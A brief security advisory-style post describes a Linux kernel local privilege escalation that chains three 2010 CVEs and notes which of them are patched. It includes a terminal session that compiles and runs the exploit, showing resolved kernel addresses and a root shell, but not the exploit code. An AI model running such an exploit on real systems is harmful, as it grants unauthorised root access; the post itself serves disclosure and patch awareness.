A new local privilege escalation has been discovered in the Linux kernel as reported in the Full Disclosure mailing list.
The exploit combines three different vulnerabilities to gain root privileges: CVE-2010-4258, CVE-2010-3849 and CVE-2010-3850.
The Econet protocol (CVE-2010-3849) is not supported by default in RedHat like distributions (RHEL, CentOS and Fedora) and the majors distributions already patched CVE-2010-3849 and CVE-2010-3850, so up to date systems should not be affected by this particular exploit.
CVE-2010-4258 is the main vulnerability and it is still unpatched. Somebody could find another way to trigger the vulnerability.
msk@ubuntu:~/exploit$ gcc 15704.c -o foo msk@ubuntu:~/exploit$ ./foo [*] Resolving kernel addresses... [+] Resolved econet_ioctl to 0xe08b72a0 [+] Resolved econet_ops to 0xe08b73a0 [+] Resolved commit_creds to 0xc016c830 [+] Resolved prepare_kernel_cred to 0xc016cc80 [*] Calculating target... [*] Triggering payload... [*] Got root! # id uid=0(root) gid=0(root) groups=0(root) #